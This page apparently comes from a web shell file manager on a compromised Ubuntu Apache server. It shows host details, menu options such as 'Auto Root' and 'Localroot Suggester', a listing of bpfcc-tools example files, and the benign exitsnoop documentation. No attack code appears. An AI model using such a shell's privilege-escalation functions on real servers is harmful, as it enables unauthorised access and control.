Linux jobworks 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64
Apache/2.4.58 (Ubuntu)
Server IP : 10.0.1.5 & Your IP : 216.73.217.52
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
bpfcc-tools /
examples /
doc /
Delete
Unzip
Name
Size
Permission
Date
Action
lib
[ DIR ]
drwxr-xr-x
2025-11-05 21:34
argdist_example.txt
22.49
KB
-rw-r--r--
2023-12-08 15:36
bashreadline_example.txt
882
B
-rw-r--r--
2023-12-08 15:36
bindsnoop_example.txt
4.42
KB
-rw-r--r--
2023-12-08 15:36
biolatency_example.txt
23.46
KB
-rw-r--r--
2023-12-08 15:36
biolatpcts_example.txt
2.97
KB
-rw-r--r--
2023-12-08 15:36
biopattern_example.txt
1.37
KB
-rw-r--r--
2023-12-08 15:36
biosnoop_example.txt
3.47
KB
-rw-r--r--
2023-12-08 15:36
biotop_example.txt
9.11
KB
-rw-r--r--
2023-12-08 15:36
bitesize_example.txt
4.98
KB
-rw-r--r--
2023-12-08 15:36
bpflist_example.txt
2.13
KB
-rw-r--r--
2023-12-08 15:36
btrfsdist_example.txt
9.32
KB
-rw-r--r--
2023-12-08 15:36
btrfsslower_example.txt
6.65
KB
-rw-r--r--
2023-12-08 15:36
cachestat_example.txt
3.92
KB
-rw-r--r--
2023-12-08 15:36
cachetop_example.txt
3.83
KB
-rw-r--r--
2023-12-08 15:36
capable_example.txt
6.5
KB
-rw-r--r--
2023-12-08 15:36
cobjnew_example.txt
2.97
KB
-rw-r--r--
2023-12-08 15:36
compactsnoop_example.txt
9.92
KB
-rw-r--r--
2023-12-08 15:36
cpudist_example.txt
16.48
KB
-rw-r--r--
2023-12-08 15:36
cpuunclaimed_example.txt
15.2
KB
-rw-r--r--
2023-12-08 15:36
criticalstat_example.txt
4.81
KB
-rw-r--r--
2023-12-08 15:36
cthreads_example.txt
2.08
KB
-rw-r--r--
2023-12-08 15:36
dbslower_example.txt
3.89
KB
-rw-r--r--
2023-12-08 15:36
dbstat_example.txt
6.5
KB
-rw-r--r--
2023-12-08 15:36
dcsnoop_example.txt
4.27
KB
-rw-r--r--
2023-12-08 15:36
dcstat_example.txt
3.26
KB
-rw-r--r--
2023-12-08 15:36
deadlock_example.txt
16.25
KB
-rw-r--r--
2023-12-08 15:36
dirtop_example.txt
4.98
KB
-rw-r--r--
2023-12-08 15:36
drsnoop_example.txt
5
KB
-rw-r--r--
2023-12-08 15:36
execsnoop_example.txt
6.64
KB
-rw-r--r--
2023-12-08 15:36
exitsnoop_example.txt
6.22
KB
-rw-r--r--
2023-12-08 15:36
ext4dist_example.txt
8.78
KB
-rw-r--r--
2023-12-08 15:36
ext4slower_example.txt
11.07
KB
-rw-r--r--
2023-12-08 15:36
filegone_example.txt
743
B
-rw-r--r--
2023-12-08 15:36
filelife_example.txt
2.04
KB
-rw-r--r--
2023-12-08 15:36
fileslower_example.txt
5.58
KB
-rw-r--r--
2023-12-08 15:36
filetop_example.txt
6.8
KB
-rw-r--r--
2023-12-08 15:36
funccount_example.txt
13.29
KB
-rw-r--r--
2023-12-08 15:36
funcinterval_example.txt
15.28
KB
-rw-r--r--
2023-12-08 15:36
funclatency_example.txt
20.98
KB
-rw-r--r--
2023-12-08 15:36
funcslower_example.txt
6.63
KB
-rw-r--r--
2023-12-08 15:36
gethostlatency_example.txt
1.29
KB
-rw-r--r--
2023-12-08 15:36
hardirqs_example.txt
37.05
KB
-rw-r--r--
2023-12-08 15:36
inject_example.txt
6.67
KB
-rw-r--r--
2023-12-08 15:36
javacalls_example.txt
3.91
KB
-rw-r--r--
2023-12-08 15:36
javaflow_example.txt
5.88
KB
-rw-r--r--
2023-12-08 15:36
javagc_example.txt
3.78
KB
-rw-r--r--
2023-12-08 15:36
javaobjnew_example.txt
2.97
KB
-rw-r--r--
2023-12-08 15:36
javastat_example.txt
2.98
KB
-rw-r--r--
2023-12-08 15:36
javathreads_example.txt
2.08
KB
-rw-r--r--
2023-12-08 15:36
killsnoop_example.txt
1.31
KB
-rw-r--r--
2023-12-08 15:36
klockstat_example.txt
8.34
KB
-rw-r--r--
2023-12-08 15:36
kvmexit_example.txt
11.63
KB
-rw-r--r--
2023-12-08 15:36
llcstat_example.txt
3.24
KB
-rw-r--r--
2023-12-08 15:36
mdflush_example.txt
1.74
KB
-rw-r--r--
2023-12-08 15:36
memleak_example.txt
10.02
KB
-rw-r--r--
2023-12-08 15:36
mountsnoop_example.txt
1.45
KB
-rw-r--r--
2023-12-08 15:36
mysqld_qslower_example.txt
2.3
KB
-rw-r--r--
2023-12-08 15:36
netqtop_example.txt
12.2
KB
-rw-r--r--
2023-12-08 15:36
nfsdist_example.txt
8.31
KB
-rw-r--r--
2023-12-08 15:36
nfsslower_example.txt
7.68
KB
-rw-r--r--
2023-12-08 15:36
nodegc_example.txt
3.78
KB
-rw-r--r--
2023-12-08 15:36
nodestat_example.txt
2.98
KB
-rw-r--r--
2023-12-08 15:36
offcputime_example.txt
19.2
KB
-rw-r--r--
2023-12-08 15:36
offwaketime_example.txt
37.36
KB
-rw-r--r--
2023-12-08 15:36
oomkill_example.txt
1.88
KB
-rw-r--r--
2023-12-08 15:36
opensnoop_example.txt
10.33
KB
-rw-r--r--
2023-12-08 15:36
perlcalls_example.txt
3.91
KB
-rw-r--r--
2023-12-08 15:36
perlflow_example.txt
5.88
KB
-rw-r--r--
2023-12-08 15:36
perlstat_example.txt
2.98
KB
-rw-r--r--
2023-12-08 15:36
phpcalls_example.txt
3.91
KB
-rw-r--r--
2023-12-08 15:36
phpflow_example.txt
5.88
KB
-rw-r--r--
2023-12-08 15:36
phpstat_example.txt
2.98
KB
-rw-r--r--
2023-12-08 15:36
pidpersec_example.txt
677
B
-rw-r--r--
2023-12-08 15:36
ppchcalls_example.txt
6.93
KB
-rw-r--r--
2023-12-08 15:36
profile_example.txt
31.08
KB
-rw-r--r--
2023-12-08 15:36
pythoncalls_example.txt
3.91
KB
-rw-r--r--
2023-12-08 15:36
pythonflow_example.txt
5.88
KB
-rw-r--r--
2023-12-08 15:36
pythongc_example.txt
3.78
KB
-rw-r--r--
2023-12-08 15:36
pythonstat_example.txt
2.98
KB
-rw-r--r--
2023-12-08 15:36
rdmaucma_example.txt
1.94
KB
-rw-r--r--
2023-12-08 15:36
readahead_example.txt
3.17
KB
-rw-r--r--
2023-12-08 15:36
reset-trace_example.txt
9.15
KB
-rw-r--r--
2023-12-08 15:36
rubycalls_example.txt
3.91
KB
-rw-r--r--
2023-12-08 15:36
rubyflow_example.txt
5.88
KB
-rw-r--r--
2023-12-08 15:36
rubygc_example.txt
3.78
KB
-rw-r--r--
2023-12-08 15:36
rubyobjnew_example.txt
2.97
KB
-rw-r--r--
2023-12-08 15:36
rubystat_example.txt
2.98
KB
-rw-r--r--
2023-12-08 15:36
runqlat_example.txt
31.3
KB
-rw-r--r--
2023-12-08 15:36
runqlen_example.txt
11.85
KB
-rw-r--r--
2023-12-08 15:36
runqslower_example.txt
2.13
KB
-rw-r--r--
2023-12-08 15:36
shmsnoop_example.txt
2.73
KB
-rw-r--r--
2023-12-08 15:36
slabratetop_example.txt
5.22
KB
-rw-r--r--
2023-12-08 15:36
sofdsnoop_example.txt
3.14
KB
-rw-r--r--
2023-12-08 15:36
softirqs_example.txt
11.02
KB
-rw-r--r--
2023-12-08 15:36
solisten_example.txt
2.3
KB
-rw-r--r--
2023-12-08 15:36
sslsniff_example.txt
6.74
KB
-rw-r--r--
2023-12-08 15:36
stackcount_example.txt
21.45
KB
-rw-r--r--
2023-12-08 15:36
statsnoop_example.txt
3.02
KB
-rw-r--r--
2023-12-08 15:36
swapin.txt
2.57
KB
-rw-r--r--
2023-12-08 15:36
swapin_example.txt
1.39
KB
-rw-r--r--
2023-12-08 15:36
syncsnoop_example.txt
387
B
-rw-r--r--
2023-12-08 15:36
syscount_example.txt
6.27
KB
-rw-r--r--
2023-12-08 15:36
tclcalls_example.txt
3.91
KB
-rw-r--r--
2023-12-08 15:36
tclflow_example.txt
5.88
KB
-rw-r--r--
2023-12-08 15:36
tclobjnew_example.txt
2.97
KB
-rw-r--r--
2023-12-08 15:36
tclstat_example.txt
2.98
KB
-rw-r--r--
2023-12-08 15:36
tcpaccept_example.txt
2.76
KB
-rw-r--r--
2023-12-08 15:36
tcpcong_example.txt
33.31
KB
-rw-r--r--
2023-12-08 15:36
tcpconnect_example.txt
6.27
KB
-rw-r--r--
2023-12-08 15:36
tcpconnlat_example.txt
2.55
KB
-rw-r--r--
2023-12-08 15:36
tcpdrop_example.txt
1.95
KB
-rw-r--r--
2023-12-08 15:36
tcplife_example.txt
6.83
KB
-rw-r--r--
2023-12-08 15:36
tcpretrans_example.txt
3.85
KB
-rw-r--r--
2023-12-08 15:36
tcprtt_example.txt
9.83
KB
-rw-r--r--
2023-12-08 15:36
tcpstates_example.txt
2.84
KB
-rw-r--r--
2023-12-08 15:36
tcpsubnet_example.txt
5.37
KB
-rw-r--r--
2023-12-08 15:36
tcpsynbl_example.txt
1.15
KB
-rw-r--r--
2023-12-08 15:36
tcptop_example.txt
5.75
KB
-rw-r--r--
2023-12-08 15:36
tcptracer_example.txt
1.98
KB
-rw-r--r--
2023-12-08 15:36
threadsnoop_example.txt
1.07
KB
-rw-r--r--
2023-12-08 15:36
tplist_example.txt
4.4
KB
-rw-r--r--
2023-12-08 15:36
trace_example.txt
21.62
KB
-rw-r--r--
2023-12-08 15:36
ttysnoop_example.txt
3.24
KB
-rw-r--r--
2023-12-08 15:36
vfscount_example.txt
2.17
KB
-rw-r--r--
2023-12-08 15:36
vfsstat_example.txt
1.66
KB
-rw-r--r--
2023-12-08 15:36
virtiostat_example.txt
2.62
KB
-rw-r--r--
2023-12-08 15:36
wakeuptime_example.txt
33.25
KB
-rw-r--r--
2023-12-08 15:36
xfsdist_example.txt
6.77
KB
-rw-r--r--
2023-12-08 15:36
xfsslower_example.txt
6.91
KB
-rw-r--r--
2023-12-08 15:36
zfsdist_example.txt
9.52
KB
-rw-r--r--
2023-12-08 15:36
zfsslower_example.txt
7.37
KB
-rw-r--r--
2023-12-08 15:36
Save
Rename
Demonstrations of exitsnoop. This Linux tool traces all process terminations and reason, it - is implemented using BPF, which requires CAP_SYS_ADMIN and should therefore be invoked with sudo - traces sched_process_exit tracepoint in kernel/exit.c - includes processes by root and all users - includes processes in containers - includes processes that become zombie The following example shows the termination of the 'sleep' and 'bash' commands when run in a loop that is interrupted with Ctrl-C from the terminal: # ./exitsnoop.py > exitlog & [1] 18997 # for((i=65;i<100;i+=5)); do bash -c "sleep 1.$i;exit $i"; done ^C # fg ./exitsnoop.py > exitlog ^C # cat exitlog PCOMM PID PPID TID AGE(s) EXIT_CODE sleep 19004 19003 19004 1.65 0 bash 19003 17656 19003 1.65 code 65 sleep 19007 19006 19007 1.70 0 bash 19006 17656 19006 1.70 code 70 sleep 19010 19009 19010 1.75 0 bash 19009 17656 19009 1.75 code 75 sleep 19014 19013 19014 0.23 signal 2 (INT) bash 19013 17656 19013 0.23 signal 2 (INT) # The output shows the process/command name (PCOMM), the PID, the process that will be notified (PPID), the thread (TID), the AGE of the process with hundredth of a second resolution, and the reason for the process exit (EXIT_CODE). A -t option can be used to include a timestamp column, it shows local time by default. The --utc option shows the time in UTC. The --label option adds a column indicating the tool that generated the output, 'exit' by default. If other tools follow this format their outputs can be merged into a single trace with a simple lexical sort increasing in time order with each line labeled to indicate the event, e.g. 'exec', 'open', 'exit', etc. Time is displayed with millisecond resolution. The -x option will show only non-zero exits and fatal signals, which excludes processes that exit with 0 code: # ./exitsnoop.py -t --utc -x --label= > exitlog & [1] 18289 # for((i=65;i<100;i+=5)); do bash -c "sleep 1.$i;exit $i"; done ^C # fg ./exitsnoop.py -t --utc -x --label= > exitlog ^C # cat exitlog TIME-UTC LABEL PCOMM PID PPID TID AGE(s) EXIT_CODE 13:20:22.997 exit bash 18300 17656 18300 1.65 code 65 13:20:24.701 exit bash 18303 17656 18303 1.70 code 70 13:20:26.456 exit bash 18306 17656 18306 1.75 code 75 13:20:28.260 exit bash 18310 17656 18310 1.80 code 80 13:20:30.113 exit bash 18313 17656 18313 1.85 code 85 13:20:31.495 exit sleep 18318 18317 18318 1.38 signal 2 (INT) 13:20:31.495 exit bash 18317 17656 18317 1.38 signal 2 (INT) # USAGE message: # ./exitsnoop.py -h usage: exitsnoop.py [-h] [-t] [--utc] [-p PID] [--label LABEL] [-x] [--per-thread] Trace all process termination (exit, fatal signal) optional arguments: -h, --help show this help message and exit -t, --timestamp include timestamp (local time default) --utc include timestamp in UTC (-t implied) -p PID, --pid PID trace this PID only --label LABEL label each line -x, --failed trace only fails, exclude exit(0) --per-thread trace per thread termination examples: exitsnoop # trace all process termination exitsnoop -x # trace only fails, exclude exit(0) exitsnoop -t # include timestamps (local time) exitsnoop --utc # include timestamps (UTC) exitsnoop -p 181 # only trace PID 181 exitsnoop --label=exit # label each output line with 'exit' exitsnoop --per-thread # trace per thread termination Exit status: 0 EX_OK Success 2 argparse error 70 EX_SOFTWARE syntax error detected by compiler, or verifier error from kernel 77 EX_NOPERM Need sudo (CAP_SYS_ADMIN) for BPF() system call About process termination in Linux ---------------------------------- A program/process on Linux terminates normally - by explicitly invoking the exit( int ) system call - in C/C++ by returning an int from main(), ...which is then used as the value for exit() - by reaching the end of main() without a return ...which is equivalent to return 0 (C99 and C++) Notes: - Linux keeps only the least significant eight bits of the exit value - an exit value of 0 means success - an exit value of 1-255 means an error A process terminates abnormally if it - receives a signal which is not ignored or blocked and has no handler ... the default action is to terminate with optional core dump - is selected by the kernel's "Out of Memory Killer", equivalent to being sent SIGKILL (9), which cannot be ignored or blocked Notes: - any signal can be sent asynchronously via the kill() system call - synchronous signals are the result of the CPU detecting a fault or trap during execution of the program, a kernel handler is dispatched which determines the cause and the corresponding signal, examples are - attempting to fetch data or instructions at invalid or privileged addresses, - attempting to divide by zero, unmasked floating point exceptions - hitting a breakpoint Linux keeps process termination information in 'exit_code', an int within struct 'task_struct' defined in <linux/sched.c> - if the process terminated normally: - the exit value is in bits 15:8 - the least significant 8 bits of exit_code are zero (bits 7:0) - if the process terminates abnormally: - the signal number (>= 1) is in bits 6:0 - bit 7 indicates a 'core dump' action, whether a core dump was actually done depends on ulimit. Success is indicated with an exit value of zero. The meaning of a non zero exit value depends on the program. Some programs document their exit values and their meaning. This script uses exit values as defined in <include/sysexits.h> References: https://github.com/torvalds/linux/blob/master/kernel/exit.c https://github.com/torvalds/linux/blob/master/arch/x86/include/uapi/asm/signal.h https://code.woboq.org/userspace/glibc/misc/sysexits.h.html